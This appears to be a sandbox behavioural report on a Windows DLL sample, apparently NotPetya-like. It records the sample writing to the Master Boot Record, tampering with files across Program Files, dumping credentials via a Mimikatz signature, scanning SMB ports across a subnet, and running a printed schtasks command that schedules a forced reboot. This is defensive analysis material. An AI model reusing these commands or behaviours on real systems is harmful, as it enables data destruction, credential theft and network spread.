| File opened for modification | C:\Program Files\Microsoft Office\Office16\OSPP.VBS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jni.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\classfile_constants.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\MergeClose.dwg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmti.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jawt.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\javafx-src.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADE3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADE3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADE3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADE3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADE3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADE3.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ADE3.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:36
C:\Users\Admin\AppData\Local\Temp\ADE3.tmp
"C:\Users\Admin\AppData\Local\Temp\ADE3.tmp" \\.\pipe\{7A18E02B-C389-425E-8EC2-0C9D6B53B827}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:36
Network
| Country | Destination | Domain | Proto |
| FI | 37.27.61.181:445 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| FI | 37.27.61.181:139 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.0:139 | tcp | |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| N/A | 10.127.0.8:445 | tcp | |
| US | 8.8.8.8:53 | 102.209.201.84.in-addr.arpa | udp |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp |
Files
memory/5004-0-0x0000000002AF0000-0x0000000002B4E000-memory.dmp
memory/5004-8-0x0000000002AF0000-0x0000000002B4E000-memory.dmp
memory/5004-9-0x0000000002AF0000-0x0000000002B4E000-memory.dmp
memory/5004-11-0x0000000002AF0000-0x0000000002B4E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ADE3.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/5004-22-0x0000000002AF0000-0x0000000002B4E000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Mimikatz
Mimikatz family
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B6EC.tmp | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\ImportPublish.asp | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jawt.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\classfile_constants.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jni.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\javafx-src.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office16\OSPP.VBS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmti.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed9 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B6EC.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B6EC.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B6EC.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B6EC.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B6EC.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B6EC.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\B6EC.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:36
C:\Users\Admin\AppData\Local\Temp\B6EC.tmp
"C:\Users\Admin\AppData\Local\Temp\B6EC.tmp" \\.\pipe\{34CD1734-388D-43CE-B4BC-AFBD4CA6E864}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:36
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| N/A | 10.127.0.0:445 | tcp | |
| DE | 136.243.76.173:445 | tcp | |
| US | 84.201.209.75:445 | ctldl.windowsupdate.com | tcp |
| N/A | 10.127.0.1:445 | tcp | |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| DE | 136.243.76.173:139 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| US | 84.201.209.75:139 | ctldl.windowsupdate.com | tcp |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| N/A | 10.127.0.7:139 | tcp | |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| N/A | 10.127.0.8:445 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| US | 8.8.8.8:53 | 66.208.201.84.in-addr.arpa | udp |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
